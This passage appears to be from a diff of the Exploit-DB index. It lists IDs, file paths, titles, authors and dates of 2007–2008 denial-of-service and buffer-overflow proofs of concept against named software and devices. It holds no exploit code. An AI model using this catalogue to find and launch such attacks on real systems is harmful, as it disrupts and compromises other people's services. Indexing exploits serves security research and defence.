Reboot (Denial of Service)",2007-04-24,MADYNES,dos,hardware, +3807,exploits/linux/dos/3807.c,"MyDNS 1.1.0 - Remote Heap Overflow (PoC)",2007-04-27,mu-b,dos,linux, +3819,exploits/windows/dos/3819.py,"RealPlayer 10 - '.ra' Remote Denial of Service",2007-04-30,n00b,dos,windows, +3826,exploits/windows/dos/3826.html,"PowerPoint Viewer OCX 3.2 - ActiveX Control Denial of Service",2007-05-01,shinnai,dos,windows, +3830,exploits/windows/dos/3830.html,"Excel Viewer OCX 3.1.0.6 - Multiple Denial of Service Vulnerabilities",2007-05-02,shinnai,dos,windows, +3836,exploits/windows/dos/3836.html,"Word Viewer OCX 3.2 - Remote Denial of Service",2007-05-03,shinnai,dos,windows, +3845,exploits/windows/dos/3845.html,"Office Viewer OCX 3.2.0.5 - Multiple Denial of Service Vulnerabilities",2007-05-04,shinnai,dos,windows, +3851,exploits/multiple/dos/3851.c,"ZOO - '.ZOO' Decompression Infinite Loop Denial of Service (PoC)",2007-05-04,Jean-Sébastien,dos,multiple, +3866,exploits/windows/dos/3866.html,"Versalsoft HTTP File Uploader - ActiveX 6.36 AddFile Remote Denial of Service",2007-05-07,shinnai,dos,windows, +3871,exploits/multiple/dos/3871.html,"Opera 9.10 - 'alert()' Remote Denial of Service",2007-05-08,Dj7xpl,dos,multiple, +3873,exploits/windows/dos/3873.html,"SmartCode VNC Manager 3.6 - 'scvncctrl.dll' Denial of Service",2007-05-08,shinnai,dos,windows, +3883,exploits/windows/dos/3883.html,"Barcodewiz ActiveX Control 2.0 - 'Barcodewiz.dll' Remote Buffer Overflow (PoC)",2007-05-09,shinnai,dos,windows, +3890,exploits/windows/dos/3890.html,"McAfee VirusScan 10.0.21 - ActiveX control Stack Overflow (PoC)",2007-05-09,callAX,dos,windows, +3891,exploits/windows/dos/3891.html,"Remote Display Dev kit 1.2.1.0 - 'RControl.dll' Denial of Service",2007-05-10,shinnai,dos,windows, +3898,exploits/windows/dos/3898.html,"Hewlett Packard 1.0.0.309 - 'hpqvwocx.dll' ActiveX Magview Overflow (PoC)",2007-05-11,callAX,dos,windows, +3910,exploits/windows/dos/3910.html,"PrecisionID Barcode ActiveX 1.3 - Denial of Service",2007-05-12,shinnai,dos,windows, +3917,exploits/windows/dos/3917.html,"ID Automation Linear Barcode - ActiveX Denial of Service",2007-05-13,shinnai,dos,windows, +3921,exploits/windows/dos/3921.html,"Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow (PoC)",2007-05-14,shinnai,dos,windows, +3926,exploits/windows/dos/3926.py,"Microsoft Windows Vista - Forged ARP packet Network Stack Denial of Service",2007-05-15,"Kristian Hermansen",dos,windows, +3929,exploits/windows/dos/3929.txt,"BitsCast 0.13.0 - invalid string Remote Denial of Service",2007-05-15,gbr,dos,windows, +3930,exploits/windows/dos/3930.txt,"NewzCrawler 1.8 - invalid string Remote Denial of Service",2007-05-15,gbr,dos,windows, +3937,exploits/windows/dos/3937.html,"PrecisionID Barcode ActiveX 1.9 - Remote Denial of Service",2007-05-16,shinnai,dos,windows, +3939,exploits/windows/dos/3939.py,"CA BrightStor Backup 11.5.2.0 - 'caloggderd.exe' Denial of Service",2007-05-16,Shirkdog,dos,windows, +3940,exploits/windows/dos/3940.py,"CA BrightStor Backup 11.5.2.0 - 'Mediasvr.exe' Denial of Service",2007-05-16,Shirkdog,dos,windows, +3945,exploits/linux/dos/3945.rb,"MagicISO 5.4 (build239) - '.cue' Heap Overflow (PoC)",2007-05-17,n00b,dos,linux, +3965,exploits/windows/dos/3965.pl,"Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service",2007-05-21,kingcope,dos,windows, +3969,exploits/windows/dos/3969.html,"LeadTools ISIS Control - 'ltisi14E.ocx 14.5.0.44' Remote Denial of Service",2007-05-22,shinnai,dos,windows, +3973,exploits/windows/dos/3973.html,"Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote Denial of Service",2007-05-23,shinnai,dos,windows, +3976,exploits/windows/dos/3976.pl,"Microsoft Visual Basic 6.0 Project - Company Name Stack Overflow (PoC)",2007-05-23,UmZ,dos,windows, +3977,exploits/windows/dos/3977.pl,"Microsoft Visual Basic 6.0 Project - Description Stack Overflow (PoC)",2007-05-23,UmZ,dos,windows, +3978,exploits/windows/dos/3978.pl,"UltraISO 8.6.2.2011 - '.cue/'.bin' Local Buffer Overflow (PoC)",2007-05-24,n00b,dos,windows, +3979,exploits/windows/dos/3979.html,"LeadTools Raster Dialog File Object - ActiveX Remote Buffer Overflow (PoC)",2007-05-24,shinnai,dos,windows, +3986,exploits/windows/dos/3986.html,"LeadTools Raster - Dialog File_D Object Remote Buffer Overflow",2007-05-25,shinnai,dos,windows, +4009,exploits/windows/dos/4009.html,"EDraw Office Viewer Component - Denial of Service",2007-05-30,shinnai,dos,windows, +4011,exploits/windows/dos/4011.html,"LeadTools Raster ISIS Object 'LTRIS14e.DLL 14.5.0.44' - Remote Buffer Overflow",2007-05-30,shinnai,dos,windows, +4012,exploits/windows/dos/4012.html,"LeadTools Raster OCR Document Object Library - Memory Corruption",2007-05-30,shinnai,dos,windows, +4017,exploits/windows/dos/4017.cpp,"Acoustica MP3 CD Burner 4.32 - Local Buffer Overflow (PoC)",2007-05-31,n00b,dos,windows, +4033,exploits/windows/dos/4033.rb,"SNMPc 7.0.18 - Remote Denial of Service (Metasploit)",2007-06-04,"En Douli",dos,windows, +4038,exploits/multiple/dos/4038.pl,"DRDoS - Distributed Reflection Denial of Service",2007-06-06,whoppix,dos,multiple, +4044,exploits/windows/dos/4044.txt,"Microsoft Windows - GDI+ '.ICO' File Remote Denial of Service",2007-06-07,Kad,dos,windows, +4046,exploits/windows/dos/4046.pl,"MiniWeb HTTP Server 0.8.x - Remote Denial of Service",2007-06-07,gbr,dos,windows, +4047,exploits/windows/dos/4047.c,"SafeNet High Assurance Remote 1.4.0 - 'IPSecDrv.sys' Remote Denial of Service",2007-06-08,mu-b,dos,windows, +4056,exploits/windows/dos/4056.html,"Internet Download Accelerator 5.2 - Remote Buffer Overflow (PoC)",2007-06-09,DeltahackingTEAM,dos,windows, +4058,exploits/windows/dos/4058.py,"Ace-FTP Client 1.24a - Remote Buffer Overflow (PoC)",2007-06-10,n00b,dos,windows, +4067,exploits/windows/dos/4067.html,"Microsoft Office - MSODataSourceControl COM-object Buffer Overflow (PoC)",2007-06-13,"YAG KOHHA",dos,windows, +4118,exploits/windows/dos/4118.html,"RealNetworks RealPlayer/HelixPlayer - SMIL wallclock Stack Overflow (PoC)",2007-06-27,axis,dos,windows, +4120,exploits/windows/dos/4120.html,"Sony Network Camera SNC-P5 1.0 - ActiveX viewer Heap Overflow (PoC)",2007-06-27,str0ke,dos,windows, +4121,exploits/windows/dos/4121.txt,"Microsoft Excel 2000/2003 - Sheet Name (PoC)",2007-06-27,ZhenHan.Liu,dos,windows, +4126,exploits/windows/dos/4126.c,"W3Filer 2.1.3 - Remote Stack Overflow (PoC)",2007-06-29,r0ut3r,dos,windows, +4137,exploits/windows/dos/4137.html,"HP Instant Support - Driver Check Remote Buffer Overflow (PoC)",2007-07-02,shinnai,dos,windows, +4148,exploits/windows/dos/4148.html,"EnjoySAP ActiveX kweditcontrol.kwedit.1 - Remote Stack Overflow (PoC)",2007-07-05,"Mark Litchfield",dos,windows, +4149,exploits/windows/dos/4149.html,"EnjoySAP ActiveX rfcguisink.rfcguisink.1 - Remote Heap Overflow (PoC)",2007-07-05,"Mark Litchfield",dos,windows, +4168,exploits/windows/dos/4168.vbs,"Sun Java WebStart - JNLP Stack Buffer Overflow (PoC)",2007-07-10,ZhenHan.Liu,dos,windows, +4175,exploits/multiple/dos/4175.php,"PHP 5.2.3 - 'bz2 com_print_typeinfo()' Denial of Service",2007-07-12,shinnai,dos,multiple, +4181,exploits/multiple/dos/4181.php,"PHP 5.2.3 - 'glob()' Denial of Service",2007-07-14,shinnai,dos,multiple, +4196,exploits/multiple/dos/4196.c,"Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service",2007-07-18,fbffff,dos,multiple, +4205,exploits/windows/dos/4205.pl,"TeamSpeak 2.0 (Windows Release) - Remote Denial of Service",2007-07-20,"YAG KOHHA",dos,windows, +4215,exploits/windows/dos/4215.pl,"Microsoft Windows Explorer - '.GIF' Image Denial of Service",2007-07-23,DeltahackingTEAM,dos,windows, +4216,exploits/linux/dos/4216.pl,"Xserver 0.1 Alpha - POST Remote Buffer Overflow",2007-07-23,deusconstruct,dos,linux, +4227,exploits/windows/dos/4227.php,"PHP 5.2.3 - 'PHP_gd2.dll' imagepsloadfont Local Buffer Overflow (PoC)",2007-07-26,r0ut3r,dos,windows, +4249,exploits/multiple/dos/4249.rb,"Asterisk < 1.2.22/1.4.8 - IAX2 Channel Driver Remote Crash",2007-07-31,tenkei_ev,dos,multiple, +4251,exploits/windows/dos/4251.html,"Microsoft Internet Explorer 6 - DirectX Media Remote Overflow Denial of Service",2007-07-31,DeltahackingTEAM,dos,windows, +4260,exploits/multiple/dos/4260.php,"PHP mSQL (msql_connect) - Local Buffer Overflow (PoC)",2007-08-06,NetJackal,dos,multiple, +4272,exploits/windows/dos/4272.c,"Cisco IOS Next Hop Resolution Protocol (NHRP) - Denial of Service",2007-08-09,"Martin Kluge",dos,windows, +4281,exploits/windows/dos/4281.c,"WengoPhone 2.x - SIP Phone Remote Denial of Service",2007-08-13,ZwelL,dos,windows, +4285,exploits/windows/dos/4285.c,"CounterPath X-Lite 3.x - SIP phone Remote Denial of Service",2007-08-13,ZwelL,dos,windows, +4288,exploits/windows/dos/4288.c,"Wireshark < 0.99.6 - Mms Remote Denial of Service",2007-08-14,ZwelL,dos,windows, +4289,exploits/windows/dos/4289.php,"EFS Easy Chat Server 2.2 - Remote Denial of Service",2007-08-14,NetJackal,dos,windows, +4293,exploits/win_x86/dos/4293.php,"PHP 5.2.0 (Windows x86) - 'PHP_win32sti' Local Buffer Overflow",2007-08-18,boecke,dos,win_x86, +4294,exploits/windows/dos/4294.pl,"Mercury/32 Mail SMTPD - Unauthenticated Remote Stack Based Overrun (PoC)",2007-08-18,eliteboy,dos,windows, +4297,exploits/hardware/dos/4297.pl,"Cisco IP Phone 7940 - 3 SIP Messages Remote Denial of Service",2007-08-21,MADYNES,dos,hardware, +4298,exploits/hardware/dos/4298.pl,"Cisco IP Phone 7940 - 10 SIP Messages Remote Denial of Service",2007-08-21,MADYNES,dos,hardware, +4304,exploits/windows/dos/4304.php,"PHP 5.2.3 - PHP_ntuser ntuser_getuserlist() Local Buffer Overflow (PoC)",2007-08-23,shinnai,dos,windows, +4318,exploits/win_x86/dos/4318.php,"PHP 5.2.0 (Windows x86) - 'PHP_iisfunc.dll' Local Buffer Overflow",2007-08-27,boecke,dos,win_x86, +4319,exploits/hardware/dos/4319.pl,"Thomson SpeedTouch ST 2030 (SIP Phone) - Remote Denial of Service",2007-08-27,MADYNES,dos,hardware, +4335,exploits/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 - 'webcam' Remote Crash",2007-08-29,wushi,dos,windows, +4337,exploits/windows/dos/4337.c,"Microsoft Windows - 'gdi32.dll' Denial of Service (MS07-046)",2007-08-29,"Gil-Dong / Woo-Chi",dos,windows, +4344,exploits/windows/dos/4344.php,"Hexamail Server 3.0.0.001 - 'pop3' Unauthenticated Remote Overflow (PoC)",2007-08-30,rgod,dos,windows, +4347,exploits/linux/dos/4347.pl,"Wireshark < 0.99.5 - DNP3 Dissector Infinite Loop",2007-08-31,"Beyond Security",dos,linux, +4359,exploits/multiple/dos/4359.txt,"Apple QuickTime < 7.2 - SMIL Remote Integer Overflow",2007-09-03,"David Vaartjes",dos,multiple, +4369,exploits/windows/dos/4369.html,"Microsoft Visual FoxPro 6.0 - FPOLE.OCX 6.0.8450.0 Remote (PoC)",2007-09-06,shinnai,dos,windows, +4373,exploits/windows/dos/4373.html,"EDraw Office Viewer Component 5.2 - ActiveX Remote Buffer Overflow (PoC)",2007-09-07,shinnai,dos,windows, +4375,exploits/windows/dos/4375.txt,"BaoFeng2 - 'mps.dll' ActiveX Multiple Remote Buffer Overflows (PoC)",2007-09-08,ZhenHan.Liu,dos,windows, +4379,exploits/windows/dos/4379.html,"Microsoft SQL Server - Distributed Management Objects 'sqldmo.dll' Buffer Overflow",2007-09-08,rgod,dos,windows, +4403,exploits/windows/dos/4403.py,"JetCast Server 2.0.0.4308 - Remote Denial of Service",2007-09-13,vCore,dos,windows, +4409,exploits/windows/dos/4409.html,"HP - ActiveX 'hpqutil.dll' ListFiles Remote Heap Overflow (PoC)",2007-09-14,GOODFELLAS,dos,windows, +4426,exploits/hardware/dos/4426.pl,"Airsensor M520 - HTTPD Unauthenticated Remote Denial of Service / Buffer Overflow (PoC)",2007-09-18,"Alex Hernandez",dos,hardware, +4432,exploits/multiple/dos/4432.html,"Sun jre1.6.0_X - isInstalled.dnsResolve Function Overflow",2007-09-19,"YAG KOHHA",dos,multiple, +4474,exploits/windows/dos/4474.html,"EDraw Office Viewer Component 5.3 - 'FtpDownloadFile()' Remote Buffer Overflow",2007-10-01,shinnai,dos,windows, +4479,exploits/windows/dos/4479.html,"CyberLink PowerDVD - CreateNewFile Remote Rewrite Denial of Service",2007-10-01,rgod,dos,windows, +4498,exploits/windows/dos/4498.pl,"WzdFTPD 0.8.0 - 'USER' Remote Denial of Service",2007-10-07,k1tk4t,dos,windows, +4532,exploits/linux/dos/4532.pl,"eXtremail 2.1.1 - 'memmove()' Remote Denial of Service",2007-10-15,mu-b,dos,linux, +4535,exploits/linux/dos/4535.pl,"eXtremail 2.1.1 - Remote Heap Overflow (PoC)",2007-10-15,mu-b,dos,linux, +4540,exploits/multiple/dos/4540.pl,"GCALDaemon 1.0-beta13 - Remote Denial of Service",2007-10-16,ikki,dos,multiple, +4559,exploits/multiple/dos/4559.txt,"Mozilla Firefox 2.0.0.7 - Remote Denial of Service",2007-10-22,BugReport.IR,dos,multiple, +4560,exploits/multiple/dos/4560.pl,"DNS Recursion Bandwidth Amplification - Denial of Service (PoC)",2007-10-23,ShadowHatesYou,dos,multiple, +4569,exploits/windows/dos/4569.pl,"CA BrightStor HSM r11.5 - Remote Stack Based Overflow / Denial of Service",2007-10-27,"Nice Name Crew",dos,windows, +4600,exploits/linux/dos/4600.py,"Firefly Media Server 0.2.4 - Remote Denial of Service",2007-11-02,nnp,dos,linux, +4601,exploits/multiple/dos/4601.txt,"Ubuntu 6.06 - DHCPd Remote Denial of Service",2007-11-02,RoMaNSoFt,dos,multiple, +4610,exploits/windows/dos/4610.html,"Viewpoint Media Player for IE 3.2 - Remote Stack Overflow (PoC)",2007-11-06,shinnai,dos,windows, +4613,exploits/windows/dos/4613.html,"Adobe Shockwave - 'ShockwaveVersion()' Stack Overflow (PoC)",2007-11-08,Elazar,dos,windows, +4615,exploits/multiple/dos/4615.txt,"MySQL 5.0.45 - 'Alter' Denial of Service",2007-11-09,"Kristian Hermansen",dos,multiple, +4624,exploits/osx/dos/4624.c,"Apple Mac OSX 10.4.x Kernel - 'i386_set_ldt()' Integer Overflow (PoC)",2007-11-16,"RISE Security",dos,osx, +4648,exploits/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH)",2007-11-23,h07,dos,multiple, +4682,exploits/windows/dos/4682.c,"Microsoft Windows Media Player - '.AIFF' Divide By Zero Exception Denial of Service (PoC)",2007-11-29,"Gil-Dong / Woo-Chi",dos,windows, +4683,exploits/windows/dos/4683.py,"RealPlayer 11 - '.au' Denial of Service",2007-12-01,NtWaK0,dos,windows, +4688,exploits/windows/dos/4688.html,"VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization",2007-12-04,"Ricardo Narvaja",dos,windows, +4689,exploits/osx/dos/4689.c,"Apple Mac OSX xnu 1228.0 - 'mach-o' Local Kernel Denial of Service (PoC)",2007-12-04,mu-b,dos,osx, +4690,exploits/osx/dos/4690.c,"Apple Mac OSX 10.5.0 (Leopard) - vpnd Remote Denial of Service (PoC)",2007-12-04,mu-b,dos,osx, +4692,exploits/hardware/dos/4692.pl,"Cisco Phone 7940 - Remote Denial of Service",2007-12-05,MADYNES,dos,hardware, +4716,exploits/windows/dos/4716.html,"Online Media Technologies 'AVSMJPEGFILE.DLL 1.1' - Remote Buffer Overflow (PoC)",2007-12-11,shinnai,dos,windows, +4717,exploits/windows/dos/4717.py,"Simple HTTPd 1.41 - '/aux' Remote Denial of Service",2007-12-11,shinnai,dos,windows, +4723,exploits/osx/dos/4723.c,"Apple Mac OSX xnu 1228.0 - 'super_blob' Local kernel Denial of Service (PoC)",2007-12-12,mu-b,dos,osx, +4732,exploits/linux/dos/4732.c,"Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow",2007-12-14,x86,dos,linux, +4742,exploits/windows/dos/4742.py,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow (PoC)",2007-12-18,r4x,dos,windows, +4748,exploits/windows/dos/4748.php,"Surgemail 38k4 - webmail Host header Denial of Service",2007-12-18,rgod,dos,windows, +4757,exploits/windows/dos/4757.txt,"HP Software Update Client 3.0.8.4 - Multiple Vulnerabilities",2007-12-19,porkythepig,dos,windows, +4773,exploits/multiple/dos/4773.pl,"OpenSSL < 0.9.7l/0.9.8d - SSLv2 Client Crash",2007-12-23,"Noam Rathaus",dos,multiple, +4801,exploits/windows/dos/4801.html,"SkyFex Client 1.0 - ActiveX 'Start()' Method Remote Stack Overflow",2007-12-28,shinnai,dos,windows, +4829,exploits/windows/dos/4829.html,"DivX Player 6.6.0 - ActiveX 'SetPassword()' Denial of Service (PoC)",2008-01-02,anonymous,dos,windows, +4856,exploits/multiple/dos/4856.php,"Half-Life CSTRIKE Server 1.6 - 'no-steam' Denial of Service",2008-01-06,"Eugene Minaev",dos,multiple, +4878,exploits/multiple/dos/4878.pl,"McAfee E-Business Server 8.5.2 - Unauthenticated Remote Code Execution / Denial of Service (PoC)",2008-01-09,"Leon Juranic",dos,multiple, +4881,exploits/solaris/dos/4881.c,"SunOS 5.10 - Remote ICMP Kernel Crash",2008-01-10,kingcope,dos,solaris, +4885,exploits/windows/dos/4885.txt,"QuickTime Player 7.3.1.70 - 'RTSP' Buffer Overflow",2008-01-10,"Luigi Auriemma",dos,windows, +4893,exploits/linux/dos/4893.c,"Linux Kernel 2.6.21.1 - IPv6 Jumbo Bug Remote Denial of Service",2008-01-11,"Clemens Kurtenbach",dos,linux, +4911,exploits/windows/dos/4911.c,"Cisco VPN Client - IPSec Driver Local kernel system pool Corruption (PoC)",2008-01-15,mu-b,dos,windows, +4931,exploits/windows/dos/4931.txt,"Crystal Reports XI Release 2 (Enterprise Tree Control) - ActiveX Buffer Overflow / Denial of Service",2008-01-17,shinnai,dos,windows, +4935,exploits/bsd/dos/4935.c,"OpenBSD 4.2 - 'rtlabel_id2name()' Local Null Pointer Dereference Denial of Service",2008-01-18,Hunger,dos,bsd, +4978,exploits/hardware/dos/4978.html,"Apple iOS 1.1.2 - Remote Denial of Service",2008-01-24,c0ntex,dos,hardware, +4997,exploits/multiple/dos/4997.sql,"Oracle 10g R1 - xdb.xdb_pitrig_pkg Buffer Overflow (PoC)",2008-01-28,sh2kerr,dos,multiple, +5036,exploits/windows/dos/5036.pl,"Titan FTP Server 6.03 - 'USER/PASS' Remote Heap Overflow (PoC)",2008-02-02,securfrog,dos,windows, +5043,exploits/windows/dos/5043.html,"Yahoo! Music Jukebox 2.2 - 'AddImage()' ActiveX Remote Buffer Overflow (PoC)",2008-02-02,h07,dos,windows, +5044,exploits/windows/dos/5044.pl,"Ipswitch WS_FTP Server with SSH 6.1.0.0 - Remote Buffer Overflow (PoC)",2008-02-03,securfrog,dos,windows, +5054,exploits/hardware/dos/5054.c,"MicroTik RouterOS 3.2 - SNMPd snmp-set Denial of Service",2008-02-03,ShadOS,dos,hardware, +5063,exploits/windows/dos/5063.pl,"NERO Media Player 1.4.0.35b - '.m3u' File Buffer Overflow (PoC)",2008-02-05,securfrog,dos,windows, +5067,exploits/windows/dos/5067.pl,"dBpowerAMP Audio Player 2 - '.m3u' Buffer Overflow (PoC)",2008-02-05,securfrog,dos,windows, +5085,exploits/windows/dos/5085.txt,"jetAudio 7.0.5 - '.asx' Remote Stack Overflow (PoC)",2008-02-08,"laurent gaffié",dos,windows, +5086,exploits/windows/dos/5086.html,"ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow (PoC)",2008-02-08,Trancek,dos,windows, +5110,exploits/windows/dos/5110.txt,"QuickTime 7.4.1 - 'QTPlugin.ocx' Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffié",dos,windows, +5122,exploits/windows/dos/5122.pl,"Rosoft Media Player 4.1.8 - '.m3u' File Remote Buffer Overflow (PoC)",2008-02-14,securfrog,dos,windows, +5142,exploits/windows/dos/5142.c,"DESlock+ < 3.2.6 - 'DLMFENC.sys' Local Kernel Ring0 link list zero (PoC)",2008-02-18,mu-b,dos,windows, +5151,exploits/ios/dos/5151.pl,"Apple iOS 4.0.3 - DPAP Server Denial of Service",2008-02-18,"David Wharton",dos,ios, +5152,exploits/multiple/dos/5152.sh,"X.Org xorg-server 1.1.1-48.13 - Probe for Files (PoC)",2008-02-19,vl4dZ,dos,multiple, +5184,exploits/windows/dos/5184.py,"MyServer 0.8.11 - '204 No Content' error Remote Denial of Service",2008-02-25,shinnai,dos,windows, +5191,exploits/multiple/dos/5191.c,"Apple Mac OSX xnu 1228.3.13 - IPv6-ipcomp Remote kernel Denial of Service (PoC)",2008-02-26,mu-b,dos,multiple, +5201,exploits/windows/dos/5201.txt,"Crysis 1.1.1.5879 - Remote Format String Denial of Service (PoC)",2008-02-28,"Long Poke",dos,windows, +5210,exploits/linux/dos/5210.c,"Galaxy FTP Server 1.0 (Neostrada Livebox DSL Router) - Denial of Service",2008-03-01,0in,dos,linux, +5217,exploits/windows/dos/5217.html,"ICQ Toolbar 2.3 - ActiveX Remote Denial of Service",2008-03-06,spdr,dos,windows, +5225,exploits/windows/dos/5225.html,"KingSoft - 'UpdateOcx2.dll SetUninstallName()' Heap Overflow (PoC)",2008-03-10,void,dos,windows, +5229,exploits/multiple/dos/5229.txt,"asg-sentry 7.0.0 - Multiple Vulnerabilities",2008-03-10,"Luigi Auriemma",dos,multiple, +5235,exploits/windows/dos/5235.py,"MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Denial of Service",2008-03-11,ryujin,dos,windows, +5258,exploits/solaris/dos/5258.c,"SunOS 5.10 Sun Cluster - 'rpc.metad' Denial of Service (PoC)",2008-03-14,kingcope,dos,solaris, +5261,exploits/windows/dos/5261.py,"Rosoft Media Player 4.1.8 - RML Stack Based Buffer Overflow (PoC)",2008-03-15,"Wiktor Sierocinski",dos,windows, +5268,exploits/multiple/dos/5268.html,"Apple Safari (webkit) (iPhone/OSX/Windows) - Remote Denial of Service",2008-03-17,"Georgi Guninski",dos,multiple, +5270,exploits/windows/dos/5270.pl,"Home FTP Server 1.4.5 - Remote Denial of Service",2008-03-17,0in,dos,windows, +5306,exploits/multiple/dos/5306.txt,"Snircd 1.3.4 - 'send_user_mode' Denial of Service",2008-03-24,"Chris Porter",dos,multiple, +5307,exploits/linux/dos/5307.pl,"MPlayer 1.0 rc2 - 'sdpplin_parse()' Array Indexing Buffer Overflow (PoC)",2008-03-25,"Guido Landi",dos,linux, +5316,exploits/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD - Remote Denial of Service",2008-03-26,muts,dos,windows, +5321,exploits/windows/dos/5321.txt,"Visual Basic - 'vbe6.dll' Local Stack Overflow (PoC) / Denial of Service",2008-03-30,Marsu,dos,windows, +5327,exploits/windows/dos/5327.txt,"Microsoft Windows Explorer - '.doc' File Denial of Service",2008-03-31,"Iron Team",dos,windows, +5341,exploits/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service",2008-04-01,Ray,dos,windows, +5343,exploits/windows/dos/5343.py,"Mcafee EPO 4.0 - 'FrameworkService.exe' Remote Denial of Service",2008-04-02,muts,dos,windows, +5344,exploits/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service",2008-04-02,muts,dos,windows, +5349,exploits/windows/dos/5349.py,"Microsoft Visual InterDev 6.0 SP6 - '.sln' Local Buffer Overflow (PoC)",2008-04-03,shinnai,dos,windows, +5354,exploits/windows/dos/5354.c,"Xitami Web Server 2.5c2 - LRWP Processing Format String (PoC)",2008-04-03,bratax,dos,windows, +5396,exploits/windows/dos/5396.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",dos,windows, +5427,exploits/windows/dos/5427.pl,"Borland Interbase 2007 - 'ibserver.exe' Buffer Overflow (PoC)",2008-04-11,"Liu Zhen Hua",dos,windows, +5438,exploits/windows/dos/5438.py,"XM Easy Personal FTP Server 5.4.0 - 'XCWD' Denial of Service",2008-04-13,j0rgan,dos,windows, +5453,exploits/windows/dos/5453.pl,"DivX Player 6.7.0 - '.srt' File Buffer Overflow (PoC)",2008-04-15,securfrog,dos,windows, +5455,exploits/windows/dos/5455.py,"BS.Player 2.27 Build 959 - '.srt' File Buffer Overflow (PoC)",2008-04-16,j0rgan,dos,windows, +5458,exploits/linux/dos/5458.txt,"Xine-Lib 1.1.12 - NSF demuxer Stack Overflow (PoC)",2008-04-16,"Guido Landi",dos,linux, +5460,exploits/windows/dos/5460.html,"Microsoft Works 7 - 'WkImgSrv.dll' ActiveX Denial of Service (PoC)",2008-04-17,"Shennan Wang",dos,windows, +5472,exploits/windows/dos/5472.py,"SubEdit Player build 4066 - subtitle Buffer Overflow (PoC)",2008-04-19,grzdyl,dos,windows, +5515,exploits/windows/dos/5515.txt,"Groupwise 7.0 - 'mailto: scheme' Buffer Overflow (PoC)",2008-04-28,"Juan Yacubian",dos,windows, +5547,exploits/windows/dos/5547.txt,"Novell eDirectory < 8.7.3 SP 10 / 8.8.2 - HTTP headers Denial of Service",2008-05-05,Nicob,dos,windows, +5561,exploits/linux/dos/5561.pl,"rdesktop 1.5.0 - 'iso_recv_msg()' Integer Underflow (PoC)",2008-05-08,"Guido Landi",dos,linux, +5585,exploits/linux/dos/5585.pl,"rdesktop 1.5.0 - 'process_redirect_pdu()' BSS Overflow (PoC)",2008-05-11,"Guido Landi",dos,linux, +5679,exploits/multiple/dos/5679.php,"PHP 5.2.6 - 'sleep()' Local Memory Exhaust",2008-05-27,Gogulas,dos,multiple, +5682,exploits/windows/dos/5682.html,"CA Internet Security Suite 2008 - 'SaveToFile()' File Corruption (PoC)",2008-05-28,Nine:Situations:Group,dos,windows, +5687,exploits/windows/dos/5687.txt,"Adobe Acrobat Reader 8.1.2 - '.PDF' Remote Denial of Service (PoC)",2008-05-29,securfrog,dos,windows, +5709,exploits/windows/dos/5709.pl,"freeSSHd 1.2.1 - Authenticated Remote Stack Overflow (PoC)",2008-05-31,securfrog,dos,windows, +5712,exploits/multiple/dos/5712.pl,"Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)",2008-06-01,"Guido Landi",dos,multiple, +5718,exploits/windows/dos/5718.pl,"Alt-N SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,dos,windows, +5727,exploits/windows/dos/5727.pl,"Alt-N MDaemon 9.6.5 - Multiple Remote Buffer Overflows (PoC)",2008-06-02,securfrog,dos,windows, +5749,exploits/multiple/dos/5749.pl,"Asterisk 1.2.x - SIP channel driver / in pedantic mode Remote Crash",2008-06-05,"Armando Oliveira",dos,multiple, +5814,exploits/linux/dos/5814.pl,"vsftpd 2.0.5 - 'CWD' Authenticated Remote Memory Consumption",2008-06-14,"Praveen Darshanam",dos,linux, +5817,exploits/windows/dos/5817.pl,"Dana IRC 1.3 - Remote Buffer Overflow (PoC)",2008-06-14,t0pP8uZz,dos,windows, +5843,exploits/windows/dos/5843.html,"P2P Foxy - Out of Memory Denial of Service",2008-06-17,Styxosaurus,dos,windows, +5851,exploits/windows/dos/5851.txt,"Visual Basic Enterprise Edition SP6 - 'vb6skit.dll' Buffer Overflow (PoC)",2008-06-18,shinnai,dos,windows, +5918,exploits/windows/dos/5918.pl,"uTorrent / BitTorrent WebIU HTTP 1.7.7/6.0.1 - Range header Denial of Service",2008-06-23,Exodus,dos,windows, +5968,exploits/windows/dos/5968.py,"Surgemail 39e-1 - Authenticated IMAP Remote Buffer Overflow Denial of Service",2008-06-30,"Travis Warren",dos,windows, +6029,exploits/multiple/dos/6029.txt,"Mozilla Firefox/Evince/EOG/Gimp - '.SVG' Denial of Service (PoC)",2008-07-08,"Kristian Hermansen",dos,multiple, +6043,exploits/osx/dos/6043.rb,"Core Image Fun House 2.0 (OSX) - Arbitrary Code Execution (PoC)",2008-07-11,"Adriel T. Desautels",dos,osx, +6046,exploits/multiple/dos/6046.txt,"reSIProcate 1.3.2 - Remote Denial of Service (PoC)",2008-07-12,"Mu Security",dos,multiple, +6059,exploits/windows/dos/6059.pl,"Simple DNS Plus 5.0/4.1 - Remote Denial of Service",2008-07-13,Exodus,dos,windows, +6072,exploits/windows/dos/6072.html,"Yahoo Messenger 8.1 - ActiveX Remote Denial of Service",2008-07-14,"Jeremy Brown",dos,windows, +6077,exploits/windows/dos/6077.c,"WinRemotePC Full+Lite 2008 r.2server - Denial of Service",2008-07-15,Shinnok,dos,windows, +6083,exploits/windows/dos/6083.html,"Document Imaging SDK 10.95 - ActiveX Buffer Overflow (PoC)",2008-07-15,r0ut3r,dos,windows, +6090,exploits/windows/dos/6090.html,"PPMate PPMedia Class - ActiveX Control Buffer Overflow (PoC)",2008-07-17,"Guido 